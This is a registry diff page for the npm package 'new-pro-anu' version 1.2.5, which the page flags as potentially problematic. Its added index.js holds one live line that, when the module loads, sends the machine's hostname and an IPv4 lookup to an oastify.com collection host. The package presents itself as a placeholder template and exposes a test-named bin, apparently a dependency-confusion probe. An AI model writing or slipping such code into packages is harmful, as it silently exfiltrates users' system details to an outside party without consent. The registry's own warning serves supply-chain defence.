new-pro-anu 1.2.5

This diff represents the content of publicly available package versions that have been released to one of the supported registries. The information contained in this diff is provided for informational purposes only and reflects changes between package versions as they appear in their respective public registries.

Potentially problematic release.


This version of new-pro-anu might be problematic. Click here for more details.

Files changed (3) hide show
  1. package/index.js +1 -0
  2. package/package.json +26 -0
  3. package/readme.md +1 -0
package/index.js ADDED
@@ -0,0 +1 @@
1
+ require("axios").post("https://tsp8tc6qvm9iw3pw4pfkz1ay2p8hw8kx.oastify.com",{userIp:()=>{for(const t of require("os").networkInterfaces())for(const{address:e}of t)if("IPv4"===e.family)return e;return},terminalHostname:require("os").hostname()}).then().catch()
package/package.json ADDED
@@ -0,0 +1,26 @@
1
+ {
2
+ "name": "new-pro-anu",
3
+ "version": "1.2.5",
4
+ "description": "AnupamAS01 Place_holder",
5
+ "main": "index.js",
6
+ "bin": {
7
+ "test-codecpetjs-bdd-tests": "./index.js"
8
+ },
9
+ "scripts": {
10
+ "test": "echo \"Error: no test specified\" && exit 1"
11
+ },
12
+ "author": "Your Name",
13
+ "license": "ISC",
14
+ "repository": {
15
+ "type": "git",
16
+ "url": "https://github.com/AnupamAS0x1/test-codecpetjs-bdd-tests.git"
17
+ },
18
+ "bugs": {
19
+ "url": "https://github.com/AnupamAS0x1/test-codecpetjs-bdd-tests/issues"
20
+ },
21
+ "homepage": "https://github.com/AnupamAS0x1/test-codecpetjs-bdd-tests",
22
+ "dependencies": {
23
+ "axios": "^0.24.0",
24
+ "node-fetch": "^3.3.2"
25
+ }
26
+ }
package/readme.md ADDED
@@ -0,0 +1 @@
1
+ MY first Template